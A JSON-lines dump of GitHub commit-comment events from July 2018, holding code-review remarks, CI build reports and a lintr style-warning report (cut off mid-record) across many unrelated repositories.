{"id":"7987267250","type":"CommitCommentEvent","actor":{"login":"prati0100"},"repo":{"name":"prati0100/freebsd"},"payload":{"comment":{"id":29760046,"position":69,"line":69,"path":"sys/x86/xen/busdma_xen.c","commit_id":"940253057069fef06bda18f9208a85893ee9e359","created_at":"2018-07-19T07:08:04Z","updated_at":"2018-07-19T07:08:04Z","author_association":"OWNER","body":"Sleepable is for whether the map can wait for resources. It is set when map_waitok() is called. gnttab_flags is simply passed to gnttab_grant_foreign_access_ref. I don't see any reason to combine them."}},"created_at":"2018-07-19T07:08:04Z"}
{"id":"7987276174","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29760058,"position":null,"line":null,"path":null,"commit_id":"2d029a9105e631b293db1cc4d3b6c052b5769b82","created_at":"2018-07-19T07:10:15Z","updated_at":"2018-07-19T07:10:15Z","author_association":"NONE","body":"#6842-WrongTempUsedInCalcRadSysHXEffectTerm (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1694 of 1694 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-2d029a9105e631b293db1cc4d3b6c052b5769b82-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-2d029a9105e631b293db1cc4d3b6c052b5769b82-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-2d029a9105e631b293db1cc4d3b6c052b5769b82-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-40.02%25-green.png)</a>\n"}},"created_at":"2018-07-19T07:10:15Z"}
{"id":"7987277908","type":"CommitCommentEvent","actor":{"login":"startaper"},"repo":{"name":"SilverKZ/rubytut"},"payload":{"comment":{"id":29760061,"position":9,"line":9,"path":"lesson2/vowels.rb","commit_id":"63de9e254f605e3b81e8d7d3d3282b9dde5ddd80","created_at":"2018-07-19T07:10:42Z","updated_at":"2018-07-19T07:10:42Z","author_association":"NONE","body":"пустая строка в конце файла\r\n"}},"created_at":"2018-07-19T07:10:42Z"}
{"id":"7987278211","type":"CommitCommentEvent","actor":{"login":"startaper"},"repo":{"name":"SilverKZ/rubytut"},"payload":{"comment":{"id":29760062,"position":9,"line":9,"path":"lesson2/numbers.rb","commit_id":"63de9e254f605e3b81e8d7d3d3282b9dde5ddd80","created_at":"2018-07-19T07:10:47Z","updated_at":"2018-07-19T07:10:47Z","author_association":"NONE","body":"пустая строка в конце файла"}},"created_at":"2018-07-19T07:10:47Z"}
{"id":"7987279785","type":"CommitCommentEvent","actor":{"login":"startaper"},"repo":{"name":"SilverKZ/rubytut"},"payload":{"comment":{"id":29760063,"position":17,"line":17,"path":"lesson2/months.rb","commit_id":"63de9e254f605e3b81e8d7d3d3282b9dde5ddd80","created_at":"2018-07-19T07:11:10Z","updated_at":"2018-07-19T07:11:10Z","author_association":"NONE","body":"нет пустой строки в конце файла\r\n\r\n"}},"created_at":"2018-07-19T07:11:10Z"}
{"id":"7987280091","type":"CommitCommentEvent","actor":{"login":"startaper"},"repo":{"name":"SilverKZ/rubytut"},"payload":{"comment":{"id":29760064,"position":31,"line":31,"path":"lesson2/market.rb","commit_id":"63de9e254f605e3b81e8d7d3d3282b9dde5ddd80","created_at":"2018-07-19T07:11:15Z","updated_at":"2018-07-19T07:11:15Z","author_association":"NONE","body":"нет пустой строки в конце файла\r\n\r\n"}},"created_at":"2018-07-19T07:11:15Z"}
{"id":"7987281082","type":"CommitCommentEvent","actor":{"login":"startaper"},"repo":{"name":"SilverKZ/rubytut"},"payload":{"comment":{"id":29760067,"position":14,"line":14,"path":"lesson2/fibonacci.rb","commit_id":"63de9e254f605e3b81e8d7d3d3282b9dde5ddd80","created_at":"2018-07-19T07:11:30Z","updated_at":"2018-07-19T07:11:30Z","author_association":"NONE","body":"нет пустой строки в конце файла\r\n\r\n"}},"created_at":"2018-07-19T07:11:30Z"}
{"id":"7987285186","type":"CommitCommentEvent","actor":{"login":"zhangby2085"},"repo":{"name":"zhangby2085/Fuzzy-String-Matching"},"payload":{"comment":{"id":29760073,"position":null,"line":null,"path":null,"commit_id":"198b7096879d180b3f2ee356c50387dec97bb6da","created_at":"2018-07-19T07:12:32Z","updated_at":"2018-07-19T07:12:32Z","author_association":"OWNER","body":"Launch in Python, dash.py same file with a test text file, for example test.txt:\r\nStep one with:\r\nimport dash\r\n#1 only dash not dash.py\r\n#run the 2 of 3 in the process of main program\r\nulines = dash.file2ulist(./test.txt')\r\nulines2 = dash.strip_beg_and_end(ulines)\r\nulines3 = dash.combine_dash(ulines2)\r\nulines4 = dash.newline_to_space(ulines3)\r\nlongline1 = dash.make_oneline(ulines4)\r\nlongline2 = dash.compress_spaces(longline1)\r\ntokens1 = dash.space_tokenize(longline2)\r\ntokens2 = dash.modify_if_dash_token(tokens1)\r\n\r\n# adding dash. in front of each defined functions, then to launch the function in dash.py\r\n\r\n"}},"created_at":"2018-07-19T07:12:32Z"}
{"id":"7987286712","type":"CommitCommentEvent","actor":{"login":"gubatron"},"repo":{"name":"frostwire/frostwire"},"payload":{"comment":{"id":29760081,"position":null,"line":null,"path":null,"commit_id":"5314afc7d910675cec202b4397ce1a31fc6589e0","created_at":"2018-07-19T07:12:54Z","updated_at":"2018-07-19T07:12:54Z","author_association":"COLLABORATOR","body":"CC @votaguz \r\n<img width=\"1016\" alt=\"screen shot 2018-07-19 at 12 53 46 am\" src=\"https://user-images.githubusercontent.com/163977/42927168-d9af8a04-8af0-11e8-9468-01be2a2cb363.png\">\r\n"}},"created_at":"2018-07-19T07:12:54Z"}
{"id":"7987290917","type":"CommitCommentEvent","actor":{"login":"Serapher"},"repo":{"name":"Serapher/111"},"payload":{"comment":{"id":29760088,"position":null,"line":null,"path":null,"commit_id":"dafa1dbe94ec548bcaeed068a600b64ebf77f98c","created_at":"2018-07-19T07:13:53Z","updated_at":"2018-07-19T07:13:53Z","author_association":"OWNER","body":"dit hi asiu aoli,qik  q9sjz  wuehwqh"}},"created_at":"2018-07-19T07:13:53Z"}
{"id":"7987292362","type":"CommitCommentEvent","actor":{"login":"startaper"},"repo":{"name":"SilverKZ/rubytut"},"payload":{"comment":{"id":29760090,"position":14,"line":14,"path":"lesson2/fibonacci.rb","commit_id":"63de9e254f605e3b81e8d7d3d3282b9dde5ddd80","created_at":"2018-07-19T07:14:14Z","updated_at":"2018-07-19T07:14:14Z","author_association":"NONE","body":"слегка запутанная система, temp, number_next, number не очевидно что есть что, читающему код, придется разбираться\r\n\r\nможно написать проще \r\n```\r\narr = [1, 1]\r\nwhile (el = arr[-1] + arr[-2]) < 100\r\n  arr << el \r\nend\r\n```"}},"created_at":"2018-07-19T07:14:14Z"}
{"id":"7987292948","type":"CommitCommentEvent","actor":{"login":"kelihlodversson"},"repo":{"name":"th-otto/binutils"},"payload":{"comment":{"id":29760092,"position":92,"line":92,"path":"ld/emultempl/mint.em","commit_id":"3e4c2d0b98e39348b6da314f870d78bedf6d9437","created_at":"2018-07-19T07:14:23Z","updated_at":"2018-07-19T07:14:23Z","author_association":"NONE","body":"If I'm not wrong, didn't Mint remove support for shared text?"}},"created_at":"2018-07-19T07:14:23Z"}
{"id":"7987293586","type":"CommitCommentEvent","actor":{"login":"JC1738"},"repo":{"name":"opentable/sous"},"payload":{"comment":{"id":29760093,"position":null,"line":null,"path":null,"commit_id":"3281533de811948215e2b9ed57a378bb72bf3616","created_at":"2018-07-19T07:14:33Z","updated_at":"2018-07-19T07:14:33Z","author_association":"MEMBER","body":"TeamCity Sous Support :: Sous Tests :: Smoke Tests Nightly (not exlude fail) [Build 40](https://teamcity.otenv.com/viewLog.html?buildId=8964756&buildTypeId=SousSupport_SousTests_SmokeTestsNightlyNotExludeFail) outcome was **UNKNOWN**\nSummary: Canceled (Step 2/2) Build time: 00:14:22"}},"created_at":"2018-07-19T07:14:33Z"}
{"id":"7987294915","type":"CommitCommentEvent","actor":{"login":"startaper"},"repo":{"name":"SilverKZ/rubytut"},"payload":{"comment":{"id":29760097,"position":14,"line":14,"path":"lesson2/fibonacci.rb","commit_id":"63de9e254f605e3b81e8d7d3d3282b9dde5ddd80","created_at":"2018-07-19T07:14:52Z","updated_at":"2018-07-19T07:14:52Z","author_association":"NONE","body":"если начинается ряд с 0, то же самое, только arr = [0, 1]"}},"created_at":"2018-07-19T07:14:52Z"}
{"id":"7987304512","type":"CommitCommentEvent","actor":{"login":"courtchao"},"repo":{"name":"hrsf99-Expressel/expressel-item-gallery-service"},"payload":{"comment":{"id":29760111,"position":21,"line":33,"path":"db/schema.js","commit_id":"812f42d14699d05832ce20bd2e51921ee78c45de","created_at":"2018-07-19T07:17:07Z","updated_at":"2018-07-19T07:17:07Z","author_association":"NONE","body":"Look into potentially using blobs for images\r\n\r\nhttps://dev.mysql.com/doc/refman/8.0/en/blob.html\r\nhttps://www.tutorialspoint.com/What-is-BLOB-data-type-in-MySQL\r\n"}},"created_at":"2018-07-19T07:17:07Z"}
{"id":"7987305076","type":"CommitCommentEvent","actor":{"login":"SAGGSOC"},"repo":{"name":"ashishrana160796/Concise-Interview-Prep"},"payload":{"comment":{"id":29760112,"position":null,"line":null,"path":null,"commit_id":"80b8992232aa7cd198c30ef23a60a8cbd8d4294f","created_at":"2018-07-19T07:17:15Z","updated_at":"2018-07-19T07:17:15Z","author_association":"COLLABORATOR","body":"Conisder a different book. This book is hogwash."}},"created_at":"2018-07-19T07:17:15Z"}
{"id":"7987306322","type":"CommitCommentEvent","actor":{"login":"minjuu55"},"repo":{"name":"2018-Interface-Programming-Exhibition/5team-Stack_Tower"},"payload":{"comment":{"id":29760115,"position":null,"line":null,"path":null,"commit_id":"f4310fa8ad9f27fcf8497ca1e5accfdc798403f0","created_at":"2018-07-19T07:17:31Z","updated_at":"2018-07-19T07:17:31Z","author_association":"CONTRIBUTOR","body":"파일등롣"}},"created_at":"2018-07-19T07:17:31Z"}
{"id":"7987312699","type":"CommitCommentEvent","actor":{"login":"DennySPB"},"repo":{"name":"aexmod-tmp/platform_kernel_xiaomi_msm8996"},"payload":{"comment":{"id":29760128,"position":null,"line":null,"path":null,"commit_id":"8eb3ce87da768c989688d1aae1a6b4c871a7f7c6","created_at":"2018-07-19T07:19:03Z","updated_at":"2018-07-19T07:19:03Z","author_association":"NONE","body":"Why not? i have NAS at home mounted via NFS. Let it be cached"}},"created_at":"2018-07-19T07:19:03Z"}
{"id":"7987315382","type":"CommitCommentEvent","actor":{"login":"Mindbreaker1"},"repo":{"name":"locutus2/Stockfish"},"payload":{"comment":{"id":29760132,"position":null,"line":null,"path":null,"commit_id":"fc03a66093bc157be3a8126b19850b12b5f83568","created_at":"2018-07-19T07:19:39Z","updated_at":"2018-07-19T07:19:39Z","author_association":"NONE","body":"Congrats!"}},"created_at":"2018-07-19T07:19:39Z"}
{"id":"7987319694","type":"CommitCommentEvent","actor":{"login":"startaper"},"repo":{"name":"Ellerden/railway_station"},"payload":{"comment":{"id":29760137,"position":7,"line":15,"path":"lib/station.rb","commit_id":"54e71dc558f100edaa1b556ed7a491de86cebecc","created_at":"2018-07-19T07:20:41Z","updated_at":"2018-07-19T07:20:41Z","author_association":"NONE","body":"Вот тут select не нужен. \r\nОн вводит в заблуждение. \r\n\r\nselect можно использовать если ты сделаешь вот так:\r\n\r\n```\r\nselected_trains = @trains.select {|train| train.type == type || type == :all }\r\nselected_trains.each do |train|\r\n  puts \"Номер поезда: #{train.num}, тип: #{train.type}, кол-во вагонов: #{train.waggonage}\"\r\nend\r\n```\r\n"}},"created_at":"2018-07-19T07:20:41Z"}
{"id":"7987320364","type":"CommitCommentEvent","actor":{"login":"marcellobarile"},"repo":{"name":"joshwcomeau/guppy"},"payload":{"comment":{"id":29760138,"position":null,"line":null,"path":null,"commit_id":"a2bd83d61140955d84dda5eb32b10a7259a4a153","created_at":"2018-07-19T07:20:51Z","updated_at":"2018-07-19T07:20:51Z","author_association":"NONE","body":"hi @karlsander,\r\naccordingly to the NPM documentation, isn't the package-lock.json supposed to be always committed? \r\n\r\nBest,\r\nM."}},"created_at":"2018-07-19T07:20:51Z"}
{"id":"7987327094","type":"CommitCommentEvent","actor":{"login":"matsest"},"repo":{"name":"HewlettPackard/POSH-HPOneView"},"payload":{"comment":{"id":29760145,"position":null,"line":null,"path":null,"commit_id":"b86da78f3371e56b9a08567da0c980aa0e3ac9dc","created_at":"2018-07-19T07:22:25Z","updated_at":"2018-07-19T07:22:25Z","author_association":"NONE","body":"Thanks for the reply @ChrisLynchHPE. Personally I find the Powershell Gallery option very doable, but at in a work environment, I'm currently stuck with 4.0 on a local network, so that makes it more difficult to automatically download from PSGallery. A signed exe is preferred, due to security policies. But perhaps as solution with Save-Module from the PSGallery on a internet-connected computer with PS5 can be done before transferring the files, in the future.. :)"}},"created_at":"2018-07-19T07:22:25Z"}
{"id":"7987328612","type":"CommitCommentEvent","actor":{"login":"cincauhangus"},"repo":{"name":"ohoushyar/dotfiles"},"payload":{"comment":{"id":29760151,"position":null,"line":null,"path":null,"commit_id":"4af68bc612fc2c0eb038f66fc4b58c5717f8ae2b","created_at":"2018-07-19T07:22:46Z","updated_at":"2018-07-19T07:22:46Z","author_association":"NONE","body":"what's this? encoded bash alias file?"}},"created_at":"2018-07-19T07:22:46Z"}
{"id":"7987331694","type":"CommitCommentEvent","actor":{"login":"siruitiancheng"},"repo":{"name":"siruitiancheng/interview_python"},"payload":{"comment":{"id":29760156,"position":4,"line":560,"path":"Readme.md","commit_id":"b73293fc3e0a2e375d233459c181d90d15541e8f","created_at":"2018-07-19T07:23:29Z","updated_at":"2018-07-19T07:23:29Z","author_association":"OWNER","body":"fjsij \r\n"}},"created_at":"2018-07-19T07:23:29Z"}
{"id":"7987358418","type":"CommitCommentEvent","actor":{"login":"githubuser05221996"},"repo":{"name":"githubuser05221996/tusk"},"payload":{"comment":{"id":29760216,"position":1,"line":1,"path":"Cars.txt","commit_id":"8d5b5efd15291b7563c0ef53475fca02474e22c6","created_at":"2018-07-19T07:29:38Z","updated_at":"2018-07-19T07:29:38Z","author_association":"OWNER","body":"tesla model x"}},"created_at":"2018-07-19T07:29:38Z"}
{"id":"7987358596","type":"CommitCommentEvent","actor":{"login":"ddeliastefania"},"repo":{"name":"turcumadalina/New_Omni_Notes2"},"payload":{"comment":{"id":29760218,"position":48,"line":48,"path":"omniNotes/src/androidTest/java/it/feio/android/omninotes/helpers/Mathers.java","commit_id":"dffd7017a34dbc3da1bc9a4023d501e9b3daea86","created_at":"2018-07-19T07:29:41Z","updated_at":"2018-07-19T07:29:41Z","author_association":"COLLABORATOR","body":"You can use constants for this strings."}},"created_at":"2018-07-19T07:29:41Z"}
{"id":"7987364243","type":"CommitCommentEvent","actor":{"login":"Telesphoreo"},"repo":{"name":"TFPatches/TotalFreedomMod"},"payload":{"comment":{"id":29760231,"position":null,"line":null,"path":null,"commit_id":"24f65dc46bffe350634d798efd9e58a5c06366a7","created_at":"2018-07-19T07:30:55Z","updated_at":"2018-07-19T07:30:55Z","author_association":"NONE","body":"babe you cant have a semi colon in the middle of that\r\n\r\nbest developer ever"}},"created_at":"2018-07-19T07:30:55Z"}
{"id":"7987372674","type":"CommitCommentEvent","actor":{"login":"WK726"},"repo":{"name":"WK726/WKDanMuView"},"payload":{"comment":{"id":29760249,"position":null,"line":null,"path":null,"commit_id":"cada15425b88ecde0cca813dee2f8e97d27e5357","created_at":"2018-07-19T07:32:50Z","updated_at":"2018-07-19T07:32:50Z","author_association":"OWNER","body":"1.弹幕的标注"}},"created_at":"2018-07-19T07:32:50Z"}
{"id":"7987376336","type":"CommitCommentEvent","actor":{"login":"pietropizzi"},"repo":{"name":"facebookarchive/react-native-custom-components"},"payload":{"comment":{"id":29760253,"position":null,"line":null,"path":null,"commit_id":"83c4fa19ccc9b6cd48ff80e457c493332819b486","created_at":"2018-07-19T07:33:41Z","updated_at":"2018-07-19T07:33:41Z","author_association":"NONE","body":"@hramos @janicduplessis Any chance you want to give some people from the community write access here and npm? It's really hard to work with this as is."}},"created_at":"2018-07-19T07:33:41Z"}
{"id":"7987376810","type":"CommitCommentEvent","actor":{"login":"garrett"},"repo":{"name":"cockpit-project/cockpit-design"},"payload":{"comment":{"id":29760255,"position":117,"line":162,"path":"storage/nbde-encryption-dialog-add.svg","commit_id":"a00104c6959ad42379c5098d10c816830fb7357d","created_at":"2018-07-19T07:33:48Z","updated_at":"2018-07-19T07:33:48Z","author_association":"CONTRIBUTOR","body":"I also cleaned defs, like I should've earlier… hence the deletions. :wink: "}},"created_at":"2018-07-19T07:33:48Z"}
{"id":"7987376880","type":"CommitCommentEvent","actor":{"login":"th-otto"},"repo":{"name":"th-otto/binutils"},"payload":{"comment":{"id":29760256,"position":92,"line":92,"path":"ld/emultempl/mint.em","commit_id":"3e4c2d0b98e39348b6da314f870d78bedf6d9437","created_at":"2018-07-19T07:33:49Z","updated_at":"2018-07-19T07:33:49Z","author_association":"OWNER","body":"Maybe, but although the target name is m68k-atari-mint, the generated executables are of course also usable on plain TOS or MagiC, so there is no need to remove that switch. Also, you can have the same effect by specifying -mprg-flags=0x800"}},"created_at":"2018-07-19T07:33:49Z"}
{"id":"7987377444","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"inbo/LSVI"},"payload":{"comment":{"id":29760258,"position":null,"line":null,"path":null,"commit_id":"753241c1e706408485d3c68311e646732cf1cd68","created_at":"2018-07-19T07:33:56Z","updated_at":"2018-07-19T07:33:56Z","author_association":"NONE","body":"[R/combinerenVerschilscore.R:35:6:](https://github.com/inbo/LSVI/blob/753241c1e706408485d3c68311e646732cf1cd68/R/combinerenVerschilscore.R#L35) *warning:* **local variable '%max%' assigned but may not be used**\n```r\n<U+200B>    `%max%` <- function(a, b) max(a, b)\n     ^~~~~\n```\n[R/combinerenVerschilscore.R:36:6:](https://github.com/inbo/LSVI/blob/753241c1e706408485d3c68311e646732cf1cd68/R/combinerenVerschilscore.R#L36) *warning:* **local variable '%min%' assigned but may not be used**\n```r\n<U+200B>    `%min%` <- function(a, b) min(a, b)\n     ^~~~~\n```\n[R/combinerenVoorwaarden.R:31:1:](https://github.com/inbo/LSVI/blob/753241c1e706408485d3c68311e646732cf1cd68/R/combinerenVoorwaarden.R#L31) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>    #nog testen of Formule bestaat uit EN, OF, haakjes en VoorwaardeID's (en evt. andere tekens die logische berekening toelaten)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/deselecteerKenmerkenInOpname.R:45:1:](https://github.com/inbo/LSVI/blob/753241c1e706408485d3c68311e646732cf1cd68/R/deselecteerKenmerkenInOpname.R#L45) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>      #Hier moet nog toegevoegd worden dat ofwel de soorten, ofwel de subsoorten gewist moeten worden al naargelang de soorten zelf in de kenmerkenlijst staan (zie berekenAantalSoorten en selecteerSoortenInOpname)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/invoercontroleData_soortenKenmerken.R:118:1:](https://github.com/inbo/LSVI/blob/753241c1e706408485d3c68311e646732cf1cd68/R/invoercontroleData_soortenKenmerken.R#L118) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>    Kenmerken <- Data_soortenKenmerken #naamsverandering is omdat code verplaatst is\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/invoercontroleData_soortenKenmerken.R:131:1:](https://github.com/inbo/LSVI/blob/753241c1e706408485d3c68311e646732cf1cd68/R/invoercontroleData_soortenKenmerken.R#L131) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>    #onderstaande code mag weg zodra Gert deze Canonicalname toegevoegd heeft aan de databank\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/invoercontroleData_voorwaarden.R:47:1:](https://github.com/inbo/LSVI/blob/753241c1e706408485d3c68311e646732cf1cd68/R/invoercontroleData_voorwaarden.R#L47) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>    #misschien best ook testen dat die indicator-criterium-combinatie in de databank voorkomt?  En of deze voor dat habitattype voorkomt, maar dat best verderop doen\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/invoercontroleData_voorwaarden.R:48:1:](https://github.com/inbo/LSVI/blob/753241c1e706408485d3c68311e646732cf1cd68/R/invoercontroleData_voorwaarden.R#L48) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>    #Voorwaarde ook verplichten?  Anders wel testen of het ok is als het aanwezig is.\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_bedekking.R:40:13:](https://github.com/inbo/LSVI/blob/753241c1e706408485d3c68311e646732cf1cd68/R/s4_bedekking.R#L40) *style:* **Commented code should be removed.**\n```r\n<U+200B>    #       (.data$WaardeMin + .data$WaardeMax) / 2\n            ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_bedekking.R:43:1:](https://github.com/inbo/LSVI/blob/753241c1e706408485d3c68311e646732cf1cd68/R/s4_bedekking.R#L43) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>    #onderstaande is om te testen of het concept werkt, berekening moet nog aangepast worden!!!\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_bedekking.R:59:7:](https://github.com/inbo/LSVI/blob/753241c1e706408485d3c68311e646732cf1cd68/R/s4_bedekking.R#L59) *style:* **Commented code should be removed.**\n```r\n<U+200B>    # BedekkingMin <- BedekkingGem * 0.9\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_bedekking.R:60:7:](https://github.com/inbo/LSVI/blob/753241c1e706408485d3c68311e646732cf1cd68/R/s4_bedekking.R#L60) *style:* **Commented code should be removed.**\n```r\n<U+200B>    # BedekkingMax <- BedekkingGem * 1.1\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_maxBedekking.R:40:13:](https://github.com/inbo/LSVI/blob/753241c1e706408485d3c68311e646732cf1cd68/R/s4_maxBedekking.R#L40) *style:* **Commented code should be removed.**\n```r\n<U+200B>    #       (.data$WaardeMin + .data$WaardeMax) / 2\n            ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_maxBedekking.R:43:1:](https://github.com/inbo/LSVI/blob/753241c1e706408485d3c68311e646732cf1cd68/R/s4_maxBedekking.R#L43) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>    #onderstaande is om te testen of het concept werkt, berekening moet nog aangepast worden!!!\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_maxBedekking.R:59:7:](https://github.com/inbo/LSVI/blob/753241c1e706408485d3c68311e646732cf1cd68/R/s4_maxBedekking.R#L59) *style:* **Commented code should be removed.**\n```r\n<U+200B>    # BedekkingMin <- BedekkingGem * 0.9\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_maxBedekking.R:60:7:](https://github.com/inbo/LSVI/blob/753241c1e706408485d3c68311e646732cf1cd68/R/s4_maxBedekking.R#L60) *style:* **Commented code should be removed.**\n```r\n<U+200B>    # BedekkingMax <- BedekkingGem * 1.1\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_maxBedekkingExcl.R:40:13:](https://github.com/inbo/LSVI/blob/753241c1e706408485d3c68311e646732cf1cd68/R/s4_maxBedekkingExcl.R#L40) *style:* **Commented code should be removed.**\n```r\n<U+200B>    #       (.data$WaardeMin + .data$WaardeMax) / 2\n            ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_maxBedekkingExcl.R:43:1:](https://github.com/inbo/LSVI/blob/753241c1e706408485d3c68311e646732cf1cd68/R/s4_maxBedekkingExcl.R#L43) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>    #onderstaande is om te testen of het concept werkt, berekening moet nog aangepast worden!!!\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_maxBedekkingExcl.R:59:7:](https://github.com/inbo/LSVI/blob/753241c1e706408485d3c68311e646732cf1cd68/R/s4_maxBedekkingExcl.R#L59) *style:* **Commented code should be removed.**\n```r\n<U+200B>    # BedekkingMin <- BedekkingGem * 0.9\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_maxBedekkingExcl.R:60:7:](https://github.com/inbo/LSVI/blob/753241c1e706408485d3c68311e646732cf1cd68/R/s4_maxBedekkingExcl.R#L60) *style:* **Commented code should be removed.**\n```r\n<U+200B>    # BedekkingMax <- BedekkingGem * 1.1\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/selecteerKenmerkenInOpname.R:55:1:](https://github.com/inbo/LSVI/blob/753241c1e706408485d3c68311e646732cf1cd68/R/selecteerKenmerkenInOpname.R#L55) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>      #Hier moet nog toegevoegd worden dat ofwel de soorten, ofwel de subsoorten gewist moeten worden al naargelang de soorten zelf in de kenmerkenlijst staan (zie berekenAantalSoorten en selecteerSoortenInOpname)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/zzz.R:31:13:](https://github.com/inbo/LSVI/blob/753241c1e706408485d3c68311e646732cf1cd68/R/zzz.R#L31) *warning:* **no visible binding for global variable 'ConnectiePool'**\n```r\n<U+200B>  poolClose(ConnectiePool)\n            ^~~~~~~~~~~~~\n```\n[inst/tests/testthat/test_berekenLSVIbasis.R:26:3:](https://github.com/inbo/LSVI/blob/753241c1e706408485d3c68311e646732cf1cd68/inst/tests/testthat/test_berekenLSVIbasis.R#L26) *style:* **Commented code should be removed.**\n```r\n<U+200B># save(Resultaat, file = \"inst/vbdata/Resultaat_test.Rdata\")\n  ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/tests/testthat/test_berekenLSVIbasis.R:27:3:](https://github.com/inbo/LSVI/blob/753241c1e706408485d3c68311e646732cf1cd68/inst/tests/testthat/test_berekenLSVIbasis.R#L27) *style:* **Commented code should be removed.**\n```r\n<U+200B># load(\"inst/vbdata/Resultaat_test.Rdata\")\n  ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/tests/testthat/test_berekenLSVIbasis.R:485:1:](https://github.com/inbo/LSVI/blob/753241c1e706408485d3c68311e646732cf1cd68/inst/tests/testthat/test_berekenLSVIbasis.R#L485) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>    #nog testen: \"Niet alle te evalueren soorten zijn opgenomen onder Data_soorten\\\\$Soort_Latijn, er wordt van uitgegaan dat de niet opgenomen soorten niet waargenomen 